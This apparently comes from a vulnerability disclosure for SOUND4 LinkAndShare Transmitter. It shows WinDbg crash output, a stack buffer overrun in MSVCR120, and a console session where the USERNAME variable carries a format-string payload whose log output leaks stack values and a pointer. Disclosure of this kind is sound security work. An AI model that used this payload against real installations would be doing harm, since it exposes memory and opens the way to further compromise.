64477791 8365e400 and dword ptr [ebp-1Ch],0
|
|
64477795 33c0 xor eax,eax
|
|
64477797 8b7508 mov esi,dword ptr [ebp+8]
|
|
6447779a 85f6 test esi,esi
|
|
6447779c 0f95c0 setne al
|
|
0:000> r
|
|
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
|
|
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
|
|
MSVCR120!_invoke_watson+0xe:
|
|
645046b1 cd29 int 29h
|
|
0:000> u 645046b1
|
|
MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]:
|
|
645046b1 cd29 int 29h
|
|
645046b3 56 push esi
|
|
645046b4 6a01 push 1
|
|
645046b6 be170400c0 mov esi,0C0000417h
|
|
645046bb 56 push esi
|
|
645046bc 6a02 push 2
|
|
645046be e85efeffff call MSVCR120!_call_reportfault (64504521)
|
|
645046c3 56 push esi
|
|
0:000> u 64477785
|
|
MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:
|
|
64477785 6a0c push 0Ch
|
|
64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)
|
|
6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)
|
|
64477791 8365e400 and dword ptr [ebp-1Ch],0
|
|
64477795 33c0 xor eax,eax
|
|
64477797 8b7508 mov esi,dword ptr [ebp+8]
|
|
6447779a 85f6 test esi,esi
|
|
6447779c 0f95c0 setne al
|
|
0:000> g
|
|
WARNING: Continuing a non-continuable exception
|
|
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
|
|
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
|
|
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
|
|
MSVCR120!_invoke_watson+0xe:
|
|
645046b1 cd29 int 29h
|
|
|
|
|
|
---
|
|
|
|
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe
|
|
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file
|
|
02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b.
|
|
.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA |